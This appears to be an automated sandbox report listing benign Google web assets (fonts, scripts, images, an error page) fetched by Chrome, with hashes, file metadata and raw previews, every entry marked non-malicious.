                                                                                                                                                                                                                                                                                          SHA1:15C0180AD7BDF9D0F963747447BC9446FC42D2DC
                                                                                                                                                                                                                                                                                          SHA-256:97399A2914C593DA2895D9729AA0170A1956E91EE54CF7550696691949558A37
                                                                                                                                                                                                                                                                                          SHA-512:94F605C4C4FE76EBDB2D5428C6BA69F83B75C65B6932251C0C3E90F92CC1F421FD9F15E81D5985693DC564B8644D90A26DA3E9C63976CF5862ED54D5ED0C4320
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://fonts.gstatic.com/s/googlesanstext/v22/5aUu9-KzpRiLCAt4Unrc-xIKmCU5qEp2iw.woff2
                                                                                                                                                                                                                                                                                          Preview:wOF2......>|..........>...........................<..:..:.`..:.....p..~.....6.$..(. ..>..N.....5xn.u..b.....c..<..Rw.H..q.(.....9A...^.=h.%J...4.\.\.[....[....h.j..AP.....a..]N.o....6.a..uO..R.|o...wO..t....s....^F...Oy....IN^..X...9sg...(;..L.....5.s~...?....%.0.f....b.. ..;.. "k+.v`.....1kq.\mqLp.]|..Z\..O......=.......h..,u.................y.h.o.Z..%.....g#..B......V...3.r....J..>g.-rU?+.3A.....C...... .21..f...Z.......P..o..g\.b... v...6..0...b.....?..-WL...Z2...1..Q./....... ..C..G.^r....O......io;.o..4.<....7.Pm..!.Nu.=..Oc............e.w.g.....,...c...0V.P...R.){..u...>*.fi..S.w.G...-..... $.8......w..hp...T@..Go....).......;.....B.)..p.\.?.-KC.S.5..pX9...'.!.-....R.Sg.>x.o.yP......S....a...m<.+".t%..3x.?3M;....k.....I&I.3g.26...p...}~....X.x..G.<)..k..U....AZ..A@....Cu..Tv{...|v.04H.$Xc..E.)<...!........^..~.7P.u...xH..rX..8O....y.k(...0.p 0.%.U...*Z...%...|LlUJ.]L_...9..AX.$E.$.sa.(v8L!...rc.-....I..W..........^U...@.....3P............M..
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1885)
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):126135
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.498654960721984
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3072:AkyvF6US20FCdrgVr3dfPeIofdhIUsTx0wVnX9Mb:AkygUS29rWPeIofdCVnX9Mb
                                                                                                                                                                                                                                                                                          MD5:C299A572DF117831926BC3A0A25BA255
                                                                                                                                                                                                                                                                                          SHA1:673F2AC4C7A41AB95FB14E2687666E81BC731E95
                                                                                                                                                                                                                                                                                          SHA-256:F847294692483E4B7666C0F98CBE2BD03B86AE27B721CAE332FEB26223DDE9FC
                                                                                                                                                                                                                                                                                          SHA-512:B418A87A350DBC0DEF9FAF3BE4B910CB21AE6FFFC6749EECEA486E3EB603F5AF92F70B936C3D440009482EDE572EE9736422CF89DCDD2B758DFA829216049179
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:"https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.SpvAvsXfWWo.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AACA/rs=AHpOoo-MoqWi0fF1M09Ccs-6QfulXvxfdg/cb=gapi.loaded_0"
                                                                                                                                                                                                                                                                                          Preview:gapi.loaded_0(function(_){var window=this;._._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a||[]};(0,_._F_toggles_initialize)([0x800000, ]);.var ba,fa,ha,na,oa,sa,ua,wa;ba=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}};fa=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.ha=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");};_.ma=ha(this);na=function(a,b){if(b)a:{var c=_.ma;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&fa(c,a,{configurable:!0,writable:!0,value:b})}};.na("Symbol",function(a){if(a)r
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):547178
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.8841055387993
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6144:826Zwjigz4YPOyAJpurxfOXxlHee9xu8AGiHyF:826ZwegsYmykQfOGeG8diH
                                                                                                                                                                                                                                                                                          MD5:28D0D2FE6B1CC43F40D112E11B47DABF
                                                                                                                                                                                                                                                                                          SHA1:010BA29FE4CD974AD208FC5D9F1080F5E7C3DBD9
                                                                                                                                                                                                                                                                                          SHA-256:3FB916C972D047648242136F66A6C22926A1BD047657575CDED6DE0F90BF635A
                                                                                                                                                                                                                                                                                          SHA-512:AD6525E175A3EA8C1CA3A0B1DA580E8FA087F36F8FC4A86D0D2A3F0B49A3BCC7B4849571F400F7714589D7ED2351680961B94CB77493092FFCE5519092579566
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:RIFFbY..WEBPVP8LVY../..D..u!...R.F..._.......WR=I.H..c.....F{......E..eI.%.*.......c..e....fB...I..d.2.'.5O.6+Y..5...:.@v..8...I..,K.eYR.z....r.......RK}..y<`.lw.h.y...~.@dY2C.@.8...S.(........a.....8X.)'..4c;..b;.EkIk.........../Gm.|....9g..h.B..(....lX....4.l.Kz......J.%.;...6.xn.R.RV.....c....a4.....9...}.`m{v.....o...uh.hl.M..=y.P..G.*4..j.........QC....r..P...'v.#(9.%.r66..|dk.>.....^ .%.oJ.....mU.$Yc.#".f...Y..\.y..#.'...!....LA....v..<H...%I....>.f..T..D. ...L.w...m.mm.k.....l.....F...|.{.....m........$.b..E*$.<.S1X....U..#..1.\k...?..Oll.L....l..H.O..3s.{).......X.../...s.^..>.dd}....H...z.c.....s.EI...{0.G.S<13yp......s..j-.%Ir$.-Q.........2..8g.5..*.......YpE.}...[r...#.....$........\k.']....}....+8h.eR..r..s..m.*y$.......oU....q^&...}.P.../...4..?.;f....h.p<U.GI........G...Cw.....#.m.....).y.c...............................................................................................................................
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):306928
                                                                                                                                                                                                                                                                                          Entropy (8bit):2.039562858464204
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:6Kl+MzwdGTw1uMCxbHsZBOsLrutmpg+LOMF:6Kl+BdyHTABOsLu4gHM
                                                                                                                                                                                                                                                                                          MD5:033DAF5F72A935E79C75C904AAB2C664
                                                                                                                                                                                                                                                                                          SHA1:A302F098851D3CFB409CA682B8C5458B1D797937
                                                                                                                                                                                                                                                                                          SHA-256:291CD22CC6A73AA65A1F5E05C1A1FD2E9851DCF62E79EF59C0C201AE91EC1716
                                                                                                                                                                                                                                                                                          SHA-512:E5537B55770B52387028E89F05895491D1703626F7C8DDAE16ABF0991C54875BCAD606F71AFB7CE40DD25F8F5E157C87DD52440FE07EA1C50B43EDAFE1A0BD3F
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/VmoqjZj_qQ4kCYjLxpy8KMOZiFtJ5Q6SkhrU36j18nYJUMvusjqk_fnfFs-ZaiI2tQ3OaUR-4kuWS_tZ2d3V-IP5DQYPUTX0i7wgDg=rw-e365-w2880
                                                                                                                                                                                                                                                                                          Preview:RIFF...WEBPVP8L.../..D..u!...r.6.$...Q.w. "&`..z...S!...&.R..6......$...Wu..3...!.d........_.-...s.5_.d.dC.d.g...Z....%a..WB..{....g.H....a.Vll...A.H0..3.U..tuOwO..5=..m..6:..}...Q..e.c.N$..L...[C{.....8M.]&;.V.khc%1.d.........}k.....6z.~........W.$Y.r.....p..L....^w.........Lr$.N#.Y.....B..a".q...n.L........FA[........Q@P@V.D.+.V.....a.i..[...m$..;.8+...a.3.^.rx.0..3.....b\M.jp.L.L...~aK.!;Be.~..\.vm5c.{?9..O..8...%....d.;...].......mm..d?./..9v9VZ#.J....5.......!....{(T.&....`..;. ..2UP... ...... .B.....:..U.. Y.].:'.E......?....6...m.~.)3\........=....s+..}..2X.^..[...de....dF.l...'..3..$.u~....&...}:...8Q.z..c.i[}.g..r.....Z./......G ....4p6..[.5.h`..`...D...n...."..@.P.9@.?.m.....R[.x.X....2..&..RG.^.g.c..TA..=:...l. ..jj.......1v.s....D.Ek:.k5.\6s.H.G.8M.$........../i...vk..mt\..}..DaN.L..........0Z.X......U[s....WL.....QU...:.2;..q.P..2ff....}...3 A...QI....5@................................................................
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1136)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1555
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.249530958699059
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:hY6svN/6zSU6pedQf3Zvcn1BZdAe1nCr1LTHI5z1sW:3qN/2+pUAew85zf
                                                                                                                                                                                                                                                                                          MD5:FBE36EB2EECF1B90451A3A72701E49D2
                                                                                                                                                                                                                                                                                          SHA1:AE56EA57C52D1153CEC33CEF91CF935D2D3AF14D
                                                                                                                                                                                                                                                                                          SHA-256:E8F2DED5D74C0EE5F427A20B6715E65BC79ED5C4FC67FB00D89005515C8EFE63
                                                                                                                                                                                                                                                                                          SHA-512:7B1FD6CF34C26AF2436AF61A1DE16C9DBFB4C43579A9499F4852A7848F873BAC15BEEEA6124CF17F46A9F5DD632162364E0EC120ACA5F65E7C5615FF178A248F
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:<!DOCTYPE html>.<html lang=en>. <meta charset=utf-8>. <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width">. <title>Error 400 (Bad Request)!!1</title>. <style>. *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//ww
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 2848x1600, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):106902
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.995515221047305
                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                          SSDEEP:1536:pT38kYxZLiU/1NkUJIgqvhpNnd6bT8nfrOM8njJX9EwafH2:JPYbXpJIgqlEaK7jh9ElfW
                                                                                                                                                                                                                                                                                          MD5:1BDB30622A6C90286E961A1B4EA31F38
                                                                                                                                                                                                                                                                                          SHA1:D0859DD71BCD5D3C864774CEBBF06B04A3DEE106
                                                                                                                                                                                                                                                                                          SHA-256:13FCBF02C3B1DDD2CAAF918E29E9F221885C087936553287E24B876E33C8FDD4
                                                                                                                                                                                                                                                                                          SHA-512:25786A450B32CC502D9F89E5939CFF647C84C41A2382F1B671623CB2899C7800A5C314998F5B4D59CB71C5E0BC4B8066E9922846624C80209F7BBD9615A89EB2
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.gstatic.com/marketing-cms/assets/images/57/a9/811e018e4007b475561628986042/8daaazzs7fdkruc.webp
                                                                                                                                                                                                                                                                                          Preview:RIFF....WEBPVP8 .........* .@.>m6.I.".*.W(.P..in.....?....1q8Gf.q.}#..[Q.{:...7.:.F.}F..W...O|.?N....='...Y...w.K......H.O/Y...~r....2`~M.'.......f...O.'......;..?....Y.o......-....._.../...>.............>n.w.../.?............_m.......'...?...............W._..:}.~...........O_.....~...........-@.j...6...5S...V...B.i.MT..f...|P.a.j.U>(Y..5i...,.v...O..l;MZj...6...5S...V.y.*..Q.(Y..5i../a.j.U>(Y..5R.MZj...6...s)....S...)...J...5..lA..j;..! ._... vAV....|P..j.../........5i...,.v...q...5i.a.a.1...@.5. 6..`e5S..z...l;......,.v.%.)P6.....L.j.U>(Y.]|.T..i.MT..f.K .....O.-.5i....j..........5h..5,.g.$e..(<9...V...B.k.....XP.a.j.U@.....|P.a.j.N.9..O..l;W..j..@v...O..l;MZj....(....9.....XEx.f...|P.a.j.Y8.@.v.._..5S...V...6.m.BAV.....)...,.v...OQ..@l;MZ..vO...v.9..O..]5i...,.v..u,.}.2...R._.....V...B.i..2Ul l;MZj.@.v...O..l;MT.vAV...8..g......i....T..f.....8X..i.M;..SU>(Y..5i...,..:.xv...O..l;S"..a.){.r......5S..Z.o..*.|Y. ......V.> 7...L.....si.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):5770
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.924824783269047
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:nwgt2TQee/zzHAW1hK2WxDNu0Oq8oZxBW/HcV9KoEG2aEOhPSSiZkiWef+tz5VRj:nZtNLzRKbnOq8oZxXuOhaSiZlWlVRj
                                                                                                                                                                                                                                                                                          MD5:FDFC174492FB323F088A603C40548D53
                                                                                                                                                                                                                                                                                          SHA1:4C55C7C71777CDF5A04DD4F52CC43C92F6A9BE40
                                                                                                                                                                                                                                                                                          SHA-256:2CC5E0495CE1DD2AB2C741326ACBC5E070A98F3D75C12EBBE3C453F65652585E
                                                                                                                                                                                                                                                                                          SHA-512:CDA3B05FC3B62AE09A84EE570168671532AF379AC8682891519E0CC8901B1D0BC076C91D7584366DEBE94469A2B6FE94C81F5A07B57BAF129894374931BE9B5E
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:RIFF....WEBPVP8Lv.../..?.o...$e.+.....m#)...{.c.S.F..].e.E....Q.._.%..5...-....,...sf.tO...m$}?b.-...U.@....(i-. ......m.(F.b..u..*....o...v..j...W\.z...9y2.}....i.F....k..4.eH..0%......:.:.fz;k..S....NC....@...d3.k.F.w.V.&!.....9.....8..Q..M.S.0N4..6..t.M(K..!....l9....n.V....C...677.....yxH>G[.aL/...u....~r."...p...w1...M.w..hooksw^~*Z...!d....E..\*...1...C..^.{..4.0M..N{...I9..r..e..0. ..n.F...t.... .....9.........GE.f...$...<,.>q......cu...U....:....Rh>.K..<..G.*owX..2...9.I]VN.=.....n.M.....6..T....y.w6..%....h0.(.... .fZ..E.z.~0/5`w@.y\.}.Ii.}._|?...........y..i...);.~.m..8......Y-Q..9ZH...!..0..~Q......Z..p...o.).U?...V.Z.>Q...t.p1....e-.f.z..(c..\..=[.v........[.YTfm. s..Y.....A....T..8...1.i.&..I..E......U"..z6/r.$.@.j...Q..4.....-.K...l....Lb.D......|.:....Q.y.T&...=..:.!..;;.a?.....}.#..x......i......a...r.G.MjY.o...c..A.?....&.6w..%G...,......<..........p.F...`s.#x.(.$9..@}..M5!..x[.0.k.a...9&It.Q..`.B.b....Q@.3I.[H".Ir.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (10636)
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):355172
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.6580024923961565
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6144:XuzL7PJOuReC2a2mZb2Q3WsvHI1pGTRs6pzpaZV4Y8YryVdImDyMKGkyTGTbBZnK:XuzL7PJOuReC2a2P+vHVpzp6MKG7GTbG
                                                                                                                                                                                                                                                                                          MD5:B8777E7CB409C50DBDF178066AD4B0A4
                                                                                                                                                                                                                                                                                          SHA1:CFD97A5271D2F3EE0E5BCF519887E302552AFF36
                                                                                                                                                                                                                                                                                          SHA-256:9B8AEEB64A135274ED46FADBED7C6E6C5B5B043C788A501E2FD02683B34B728D
                                                                                                                                                                                                                                                                                          SHA-512:A2336FE2CD84BAA20E48B2812DB809343158074A3822CAB59A8D5A79A22FD097E37A7AA52CBE37298216F640C20A352E080300A3854C8DB0416761847D6C32CB
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:"https://maps.googleapis.com/maps/api/js?callback=__googleMapsCallback&key=AIzaSyBux5gy-wv-c21aQl2an30LCk2KY4M9teI&libraries=geometry,places&language=en&v=weekly"
                                                                                                                                                                                                                                                                                          Preview:..window.google = window.google || {};.google.maps = google.maps || {};.(function() {. . var modules = google.maps.modules = {};. google.maps.__gjsload__ = function(name, text) {. modules[name] = text;. };. . google.maps.Load = function(apiLoad) {. delete google.maps.Load;. apiLoad([0.009999999776482582,[null,[["https://khms0.googleapis.com/kh?v=988\u0026hl=en\u0026","https://khms1.googleapis.com/kh?v=988\u0026hl=en\u0026"],null,null,null,1,"988",["https://khms0.google.com/kh?v=988\u0026hl=en\u0026","https://khms1.google.com/kh?v=988\u0026hl=en\u0026"]],null,null,null,null,[["https://cbks0.googleapis.com/cbk?","https://cbks1.googleapis.com/cbk?"]],[["https://khms0.googleapis.com/kh?v=163\u0026hl=en\u0026","https://khms1.googleapis.com/kh?v=163\u0026hl=en\u0026"],null,null,null,null,"163",["https://khms0.google.com/kh?v=163\u0026hl=en\u0026","https://khms1.google.com/kh?v=163\u0026hl=en\u0026"]],null,null,null,null,null,null,null,[["https://streetviewpixels-pa.googleapis.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:gzip compressed data, max compression, original size modulo 2^32 1156
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):660
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.590615698462348
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:XV3WTp5/ekUq3iECCl/PdOjgJplpWdbWeeqMXIEzpoOhf3f9jdSB:XglwkUq3fLHdkMPKbWjZXFoMf3VjUB
                                                                                                                                                                                                                                                                                          MD5:C50E04A567B1FD73B53DE5C9DA9B8BB0
                                                                                                                                                                                                                                                                                          SHA1:878AEA613A0FBBDADD4D0DA963A98F31F9362E08
                                                                                                                                                                                                                                                                                          SHA-256:95FA5D468E9081B8DCED3A857F49FBC47D8D57656902B8733ACB64582C096E60
                                                                                                                                                                                                                                                                                          SHA-512:FB926DD0B0A26C4FD90D5AC7B83BC482C3B773962009746659BCE021BC0EECEE38E8B76D57E743752702203AE8FE34DFF062D95020D1BEB19492615617E3419E
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:..........\T.nSA.|.W...l...^......?........M?..I..R..Y{}........v...z.>..fw.=..?.6.O./.V..7....~=.............x|..Z.N.z.z.x.............r.....f=m.7.........?.]O_.jD..5....M.Xe...[........j].......M...Vp.:!.{....z.U.D:.v...2..u....B..N.,.l3p......E...8.3I..,.z..6.....jF{....5^..^F..(..2.D..y......#.a;.....H.`A...Lf.h.,.G.Z......z.3...........^M.A.f.......>Fh$.a..jc.....5..}. (.7. ._.%=0%fA.g..{..A;#?....W.......>ku.........#O.Iq,.)....z ....~...0z.g.......6qE~.`.7...!.......AzC....C#5.T..2E=\.. ..._..v.UrXy....cx..Z......K....6....Jq~..F`W.c.wY....q..b.........K.X.....b5.(.....e. _......Y.o....}.H_xZ.q.G...........#......
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):5188
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.952928145135762
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:9JKglioE6pMcO5oiXZuh+u/U7pLnZ0jnn7dwp5KRf0271XM8zAJPzSjCWdJ28/p2:9J66pTOlI+u/U7pLnZ0jn7dwuRfU8zAd
                                                                                                                                                                                                                                                                                          MD5:714ACF1F5A07C6204BBD7E59194A2870
                                                                                                                                                                                                                                                                                          SHA1:3F8170F84AA88CC81D56C4383CF3758E7945D71F
                                                                                                                                                                                                                                                                                          SHA-256:1C58D90328C77231DAAA4F46073F3BADE862DB0E24A896F1B17912BB52C0FDDA
                                                                                                                                                                                                                                                                                          SHA-512:FE1D52B327E09B1936B156546DF09F10802ED8D51C474217F4E02FFB8C312F519540136833C5E51A07CC7E25A748F2DECAC7D393885BF4AF05A53CB9C52465B9
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....sBIT....|.d.....IDATx..y.T..?..^Uuu7.44;..K..n.Mp.4..Fe.......dr.1.....%.q"q..h......3!.9..M7.`\..l..&.MwUW...?Z<4T5U.....>.p..{..~.}........(P O.\;.)v\.....KP..)....Z.b........b-b<..W$f ..A$b.r....~.L.e...2.;b{[..#eFt0*.A...P...2T.#...U-..E...h=p@.N............/.}.+.....v..%.GS..2.....*.A.lE.B....Q.Aw!...g..5...[CM...k6x.6..y/...'.....a.@......m..ETv"l.j.....}W.~.]O.#/..u.XW\g..~.1.LPaX~9....V.Z./...U..\{u4y...~..X<../.0.t.H(.~..*V.7....U...6......WH]... .-P..$O|K......{z.s..z.......&L..7..$..\..!v...*...^.J....._<..9...3....\.....DY.h2..\[..b;'..]8.r.s?.A@ .>d....S...U...6.U.w.3,....Q.3.(..<.....+k.).F.&..*.3...0"[6...5.fz....d.\V...s.c^.d..@8W..z....c.G.|~\YK...9o......c&r.....~....:...{..%y...O.O....}..~.p3.`dLo9.g..U.F... 8.^.gj._.a"...}e..ll:....h...m.....q.g.2.d*..I.K.5.p. ...m...e!...|E..~..X+.@.....>[..8(.>.wy.A?MeD.=S...N....A...k.-_^].N.....eq.PsIA..X.....|yuC6Lv....X.HA...|..._...P..vJ....
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 501 x 501, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):309590
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.992244642963286
                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                          SSDEEP:6144:xOp8YT9UJfqNVywuYa55uxLdF0ipqeKmkO4CI5o2NUDbOy38AD:xhSGOyTT55kL2yky2oO7a8AD
                                                                                                                                                                                                                                                                                          MD5:7847D59E906120A457B281E6FF7075D6
                                                                                                                                                                                                                                                                                          SHA1:695A65F61F1F982346FB00F2F55E7BAD1AA234FD
                                                                                                                                                                                                                                                                                          SHA-256:32A272326C7764A78E031CF14B44EB76494770277F45D92E916E34EC22A4C704
                                                                                                                                                                                                                                                                                          SHA-512:797D2594F5F326CC33954C21C5A2C6F3AF55D7E9D92C9EB3B1839F65C135A648EAD72A3CDC3F5890E43AA790F39D1C84D3EC3B0D3B43EB41670B46EB7403420F
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR..............Hg.....sBIT....|.d... .IDATx..k.%KV.....{.s.O.}?.....Qx......0 <.....l...#..!3....2.?,.+lK&B.%...0...I..6....ax....>}.u..c..*..d...j.......qz.]....Q.[k..,`..F.i..FzC.....4.H..........O?.8.=.\.......GGO...<2.<....c....v..y.....g..vU.[......@.`..&...W..D`f......j.^v]7.'..[v]7...{..{.j}..d~...{..g...|w...;<>......W..F.i.@#..4.+@.\....|>..w..o...j..g.y.K....m..N&..4Y.V.......w.f.."...L.b...@D...X(..........)]w.0....f..L....d.w....n.W.~....|vg...3O.m.....G.i..i...Fz....[...w...{.{.....>8z.......6..i"W.m..@...........!..........NH!..3.RZ...N..}...D...K.z..g..&e!.F...J.....N&.....kGGG..p........[.y..K?GDV..i..^...>.H/..\..o............z.|.x....=G.........(..0&B...p1...@..@....XC:.C.. Z.nZ.....Q.P.....2....b...J..r1...........5f....c.......~....04#......G..tr.....^......{O_.\...B..l....e+Zll6v..A..8..-...$.om7s.T.G%. ...l....D.....x.w..5.3..A.PK....\B.F.y.....".K..{......>..5..w...............>d#.....G.).
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1431)
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):201635
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.475644599611849
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3072:BTBiAUO4TOeYoUwwy1xmV4rpV9O4z6WwsJxL4/EtqWceUgI:B2THYo11xmWrpMnsJxL4/4TceUgI
                                                                                                                                                                                                                                                                                          MD5:52826249B832AE798CADA638B9BA6E3E
                                                                                                                                                                                                                                                                                          SHA1:DDC6865A72806318C7F0AEC5E63F4446FE84D505
                                                                                                                                                                                                                                                                                          SHA-256:A0ABCCED6A2814D1B9D139001A9FD88B7C7F0F539810711348F50029E86B3B5E
                                                                                                                                                                                                                                                                                          SHA-512:D4E170FE1D48BFFB08FE13AB316538D273AE9BC425B984E3F8A53A1E8D1BB04FEE472DB14127F3106CD196A2BCAB5B2CC0819536EE1F10AB31A30FD589C07DDF
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:"https://www.gstatic.com/_/mss/boq-one-google/_/js/k=boq-one-google.OneGoogleWidgetUi.en.eh1Y-00lhsg.es5.O/am=IEAwYGw/d=1/excm=_b,_tp,calloutview/ed=1/dg=0/wt=2/ujg=1/rs=AM-SdHtgGiWdOmhyCST5m9Q52oIlUwlxzQ/m=_b,_tp"
                                                                                                                                                                                                                                                                                          Preview:"use strict";this.default_OneGoogleWidgetUi=this.default_OneGoogleWidgetUi||{};(function(_){var window=this;.try{._._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a||[]};(0,_._F_toggles_initialize)([0x20304020, 0x1b1, ]);./*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright Google LLC. SPDX-License-Identifier: Apache-2.0.*/./*. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright 2024 Google, Inc. SPDX-License-Identifier: MIT.*/.var ia,aaa,Ga,baa,Ja,cb,vb,Kb,Pb,Qb,Rb,Tb,Ub,Vb,Wb,Zb,eaa,faa,ac,cc,jc,mc,oc,gaa,uc,vc,wc,Cc,Jc,Kc,Nc,Pc,Rc,Tc,Oc,Yc,laa,ld,hd,md,maa,naa,wd,vd,oaa,zd,paa,Bd,qaa,Cd,raa,Jd,saa,Nd,Td,Ud,Wd,$d,ae,Zd,ce,ze,Ce,Ke,Ie,Le,z,Pe,Se,We,cf,zaa,yaa,Aaa,Baa,lf,Caa,Daa,Eaa,Faa,Gaa,Haa,Iaa,Kaa,Jaa,Maa,Naa,bg,fg,Taa,Raa,qg,wg,zg,Yaa,Zaa,Bg,Qg,cba,dba,Vg,eba,fba,gba,ih,jh,kh,hba,iba,nh,kba,lba,rh,sh,pba,rba,sba,tba,uba,vba,wba,xba,zba,Aba,Bba,Dba,Eba,aa,
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):6717
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.9593647465549235
